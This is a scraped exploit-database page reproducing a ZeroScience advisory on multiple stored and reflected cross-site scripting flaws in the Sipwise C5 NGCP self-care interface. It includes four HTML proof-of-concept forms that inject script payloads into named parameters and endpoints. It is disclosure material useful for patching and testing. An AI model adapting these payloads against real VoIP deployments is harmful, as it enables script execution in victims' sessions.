0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Sipwise C5 NGCP CSC - (Multiple) Stored/Reflected Cross-Site Scripting Vulnerability

Author

LiquidWorm

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com

Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities


Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
                  NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.

Tested on: Apache/2.2.22 (Debian)
           Apache/2.2.16 (Debian)
           nginx


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php


13.04.2021

--


Stored XSS (POST tsetname):
---------------------------

<html>
  <body>
    <form action="https://10.0.1.7/callforward/time/set/save" method="POST">
      <input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
      <input type="hidden" name="subscriber&#95;id" value="401" />
      <input type="hidden" name="x" value="90027" />
      <input type="hidden" name="y" value="&#45;1" />
      <input type="submit" value="Go for callforward" />
    </form>
  </body>
</html>


Reflected XSS (GET filter):
---------------------------

<html>
  <body>
    <form action="https://10.0.1.7/addressbook" method="GET">
      <input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
      <input type="hidden" name="x" value="0" />
      <input type="hidden" name="y" value="0" />
      <input type="submit" value="Go for addressbook" />
    </form>
  </body>
</html>


Stored XSS (POST firstname, lastname, company):
-----------------------------------------------

<html>
  <body>
    <form action="https://10.0.1.7/addressbook/save" method="POST">
      <input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
      <input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
      <input type="hidden" name="company" value='"><script>alert(251)</script>' />
      <input type="hidden" name="homephonenumber" value="1112223333" />
      <input type="hidden" name="phonenumber" value="3332221111" />
      <input type="hidden" name="mobilenumber" value="" />
      <input type="hidden" name="faxnumber" value="" />
      <input type="hidden" name="email" value="lab%40zeroscience.mk" />
      <input type="hidden" name="homepage" value="" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="x" value="89957" />
      <input type="hidden" name="y" value="21" />
      <input type="submit" value="Go for addressbook 2" />
    </form>
  </body>
</html>


Reflected XSS (GET lang):
-------------------------

<html>
  <body>
    <form action="https://10.0.1.7/statistics/versions" method="GET">
      <input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
      <input type="submit" value="Go for statistics" />
    </form>
  </body>
</html>

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Sipwise C5 NGCP CSC - (Multiple) Stored/Reflected Cross-Site Scripting Vulnerability

Report Error

Report Error